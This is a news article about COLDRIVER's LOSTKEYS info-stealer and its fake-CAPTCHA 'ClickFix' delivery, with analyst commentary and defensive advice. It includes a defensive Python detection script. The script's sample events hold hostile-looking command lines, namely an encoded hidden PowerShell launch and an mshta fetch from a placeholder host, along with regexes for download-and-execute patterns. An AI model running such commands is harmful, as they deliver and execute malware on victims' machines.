Russia's COLDRIVER Targets Western Entities with 'LOSTKEYS' Malware
By Cam Sivesind
Fri | May 9, 2025 | 6:17 AM PDT

Google's Threat Intelligence Group (GTIG) has identified a new malware strain, dubbed "LOSTKEYS," attributed to the Russian state-sponsored hacking group COLDRIVER. The development marks a significant escalation in COLDRIVER's cyber espionage activities, which have traditionally focused on credential phishing.

Historically, COLDRIVER—also known as Star Blizzard, UNC4057, and Callisto—has targeted high-profile individuals and organizations, including NATO governments, NGOs, journalists, and former intelligence officers, primarily through credential phishing campaigns. The introduction of LOSTKEYS signifies a strategic shift towards deploying malware for direct data exfiltration.

"LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker," GTIG reported. The malware has been observed in campaigns as recent as April 2025, targeting advisors to Western governments and militaries, journalists, think tanks, NGOs, and individuals connected to Ukraine.

The infection process begins with a lure website featuring a fake CAPTCHA. Upon interacting with the CAPTCHA, users are prompted to execute a PowerShell command, initiating a multi-stage infection chain. Subsequent stages involve device checks to evade virtual environments and the retrieval of additional payloads, culminating in the deployment of the LOSTKEYS malware.

The method, known as "ClickFix," leverages social engineering to bypass traditional email-based defenses. "Users should exercise caution when encountering a site that prompts them to exit the browser and run commands on their device," GTIG advised.
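As an added illustration of how a defender might hunt for the ClickFix pattern the article describes (this is example code written for this page, not GTIG's detection logic or anything from the report), the script below scores constructed process-creation records for the combination GTIG warns about: a script interpreter launched by the user's desktop shell with command-line switches that hide the window, suppress policy and profile, carry an encoded command, or fetch remote content. The pipe-separated field layout, the sample events, the indicator list and the threshold are all assumptions chosen for the example.

```python
"""Score process-creation events for ClickFix-style interpreter launches.

Constructed example for this article, not GTIG tooling. The log lines imitate
a Sysmon process-creation export in an assumed pipe-separated layout:
parent_image|image|command_line|user (command lines here contain no '|').
"""
import re
from dataclasses import dataclass

# Constructed sample events; the first and last imitate a user pasting a
# "verification" command into the Run dialog, the middle two are benign.
SAMPLE_EVENTS = """\
C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -w hidden -nop -ep bypass -enc BASE64_PLACEHOLDER|CORP\\analyst
C:\\Windows\\explorer.exe|C:\\Windows\\System32\\cmd.exe|cmd /c dir|CORP\\analyst
C:\\Program Files\\Vendor\\Agent\\agent.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -NoProfile -File C:\\ProgramData\\Vendor\\inventory.ps1|NT AUTHORITY\\SYSTEM
C:\\Windows\\explorer.exe|C:\\Windows\\System32\\mshta.exe|mshta https://example.invalid/verify|CORP\\analyst
"""

# Interpreters that ClickFix-style prompts typically ask the victim to run.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# (regex, reason) pairs matched case-insensitively against the command line;
# each match adds one point to the event's score.
INDICATORS = [
    (r"-e(nc|ncodedcommand)?\s", "encoded command"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-nop(rofile)?\b", "profile suppressed"),
    (r"-e(p|xecutionpolicy)\s+bypass", "execution policy bypass"),
    (r"\biex\b|invoke-expression", "dynamic code evaluation"),
    (r"downloadstring|invoke-webrequest|net\.webclient|https?://", "remote content fetch"),
]


@dataclass
class Finding:
    user: str
    image: str
    score: int
    reasons: list


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(parent: str, image: str, cmdline: str):
    """Score one event; higher means more ClickFix-like. Returns (score, reasons)."""
    score, reasons = 0, []
    if basename(parent) == "explorer.exe":
        # Launched by the desktop shell (Run dialog, double-click), i.e. by a person,
        # which is what a "run this command to verify" lure produces.
        score += 1
        reasons.append("launched from the desktop shell")
    if basename(image) in INTERPRETERS:
        score += 1
        reasons.append(f"script interpreter {basename(image)}")
    for pattern, reason in INDICATORS:
        if re.search(pattern, cmdline, re.IGNORECASE):
            score += 1
            reasons.append(reason)
    return score, reasons


def find_clickfix_candidates(log_text: str, threshold: int = 3):
    """Return Findings for every event whose score reaches the threshold."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        parent, image, cmdline, user = line.split("|", 3)
        score, reasons = score_event(parent, image, cmdline)
        if score >= threshold:
            findings.append(Finding(user, basename(image), score, reasons))
    return findings


if __name__ == "__main__":
    for f in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"{f.user}: {f.image} score={f.score} ({'; '.join(f.reasons)})")
```

The benign administrative script in the third event scores below the threshold because it is launched by a service process and carries only a profile switch, while the two shell-launched events with hidden-window, encoded-command or remote-fetch switches are flagged; in practice the threshold and indicator list would be tuned against an organization's own baseline of interpreter launches.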

The deployment of LOSTKEYS underscores the evolving threat landscape and the increasing sophistication of state-sponsored cyber espionage operations. Organizations, particularly those in the public sector, NGOs, and media, are advised to:

  • Implement strict access controls and least privilege policies

  • Educate users on recognizing and avoiding social engineering tactics

  • Regularly update and patch systems to mitigate vulnerabilities

  • Utilize advanced threat detection and response solutions

Col. Cedric Leighton, CNN Military Analyst; U.S. Air Force (Ret.); and Chairman, Cedric Leighton Associates, LLC, always has great insights into international threats. He said:

"COLDRIVER is definitely making a name for itself. A few thoughts:

  • The introduction of a lure website with a false CAPTCHA element is an even more brazen attempt to capture target credentials and data than COLDRIVER's previously known efforts in which they ensnared targets with an "encrypted" PDF. Both efforts are extremely sophisticated and mean that regular cyber defenses are inadequate to these threats. Additionally, the cybersecurity training most people currently get does not come close to inoculating them from these attacks.
  • Stepping back to examine the geopolitical implications of COLDRIVER's deployment of the LOSTKEYS malware, it seems clear that the Russian Federation continues to pursue a policy of convincing senior officials, journalists, and thought leaders in target countries to support—or at least not challenge—the Russian position on such issues as the war in Ukraine. Since Russia has difficulty prevailing on the kinetic battlefield, it is resorting to cyberattacks and influence operations to achieve its goals. Those goals include weakening NATO and setting the stage for an eventual takeover of Ukraine—even after sustaining significant battlefield losses.
  • A key aspect of this operation also seems to be the exfiltration of sensitive data. Careless management of access to sensitive information by senior officials, as we see in the "Signalgate" scandal, only helps groups like COLDRIVER and their masters in Moscow.
  • Destroying the effectiveness of our cyber defenses, as we see with personnel cuts at agencies like U.S. CISA and NSA, makes it much harder to combat a persistent foe like COLDRIVER."

"The threat posed by the complex LOSTKEYS infection is serious, especially as the Russian state-sponsored group COLDRIVER uses the software to attack high-profile political targets. Cybersecurity is national security, and must be prioritized as such by both the public and private sectors," said Darren Guccione, CEO and Co-Founder at Keeper Security. "When used for political purposes, cyberattacks and cyber espionage can be part of larger efforts to threaten operations, destabilize a government, or disrupt critical infrastructure such as power grids, transportation networks, and financial institutions. Certain malware can even be used to destroy evidence of network infiltration for purposes such as espionage."

"Nation-state adversaries are well-resourced and difficult to defend against, particularly when the adversary has an extensive network of hackers-for-hire executing their attacks on demand," Guccione added. "As such, fortifying global cybersecurity defenses against nation-state threats will require continued coordination between law enforcement, government agencies, and private sector organizations to provide the critical tools and insight necessary to defend digital borders and safeguard critical infrastructure."

GTIG has added the identified malicious domains and files to Google's Safe Browsing to protect users from further exploitation. Potential targets are encouraged to enroll in Google's Advanced Protection Program and enable Enhanced Safe Browsing in Chrome.

"The LOSTKEYS malware shows how attackers are getting smarter at tricking people and sneaking past basic security tools, especially by using fake websites and social engineering to get users to run harmful scripts," said J. Stephen Kowski, Field CTO at SlashNext Email Security+. "Defending against these kinds of threats means having security that can spot suspicious links, fake web pages, and hidden malware in real time, even when attackers use new tricks or try to hide their tracks. It's also important to block dangerous sites and files before users ever reach them, and to catch threats that might slip through email, websites, or messaging apps. Combining these protections with good end-user awareness can help stop even the most creative attacks before they cause any harm."

VJ Viswanathan, Founding Partner at CYFORIX (Former CISO & Sr. Executive at Keurig Dr Pepper, Comcast, HD Supply, and GE), said he debriefed a community of CISOs on this very issue on the afternoon of May 8th:

"Malware-as-a-service is a thriving market particularly fueled by info-stealer malware variants. 'LOSTKEYS' is a Visual Basic Script (VBS) info-stealer malware recently observed in campaigns attributed to COLDRIVER. This malware is designed to steal files from specific directories and with specific file extensions, as well as collect system information and running processes. Its delivery mechanism often involves a multi-stage infection chain starting with a fake CAPTCHA website, socially engineering users into executing malicious PowerShell commands."

"COLDRIVER is a sophisticated threat group believed to be linked to Russian state interests (FSB); COLDRIVER was primarily known for its persistent and highly targeted credential phishing campaigns against high-profile individuals and organizations, including NATO governments, NGOs, journalists, and think tanks," Viswanathan continued. "Their historical TTPs involved creating convincing impersonation accounts and using cloud storage services to host malicious files or links leading to phishing pages. More recently, COLDRIVER has shown an evolution in its capabilities, moving beyond just credential theft to deploy custom malware like SPICA (observed in 2023-2024) and now LOSTKEYS (observed in 2025). This indicates a shift towards gaining more persistent access to target systems and exfiltrating sensitive documents and system information directly, in addition to their ongoing credential harvesting activities. Their targeting continues to focus on individuals and entities relevant to Russia's strategic interests, particularly those connected to Western governments and Ukraine."

Viswanathan added, "In addition to user awareness training to spot social engineering attacks, implement safeguards to prevent browser synchronization to separate enterprise and personal access. Continue to actively monitor and update EDR and implement advanced Identity and Access management controls while conducting periodic threat hunting for correlation events."

GTIG noted that it is not yet certain whether this new malware is related to an infection vector seen in late 2023:

"As part of the investigation into this activity, we discovered two additional samples, hashes of which are available in the Indicators of Compromise section, dating back as early as December 2023. In each case, the samples end up executing LOSTKEYS but are distinctly different from the execution chain mentioned here in that they are Portable Executable (PE) files pretending to be related to the software package Maltego.

It is currently unclear if these samples from December 2023 are related to COLDRIVER, or if the malware was repurposed from a different developer or operation into the activity seen starting in January 2025."

For more detailed information and technical indicators of the latest compromise, refer to the full GTIG report.

Tags: Russia, Malware